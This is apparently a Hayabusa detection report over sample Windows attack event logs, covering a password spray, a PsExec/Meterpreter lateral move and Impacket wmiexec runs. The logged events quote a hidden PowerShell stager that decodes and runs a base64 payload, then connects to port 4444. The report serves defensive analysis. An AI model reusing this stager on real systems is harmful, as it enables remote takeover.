DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.793 +09:00,IEWIN7,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Exec,PowerShell as a Service in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,Exec | PrivEsc | LatMov,CobaltStrike Service Installations in Registry,,../hayabusa-rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object 
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3348 | PGUID: 365ABB72-AF8B-5CC8-0000-00101C1A1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 
+09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec | C2,Curl Start Combination,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,info,,Process Created,"Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZr
T+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 3872 | PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,CredAccess,Mimikatz Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command 
Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process 
Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:54.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning 
Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 
05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 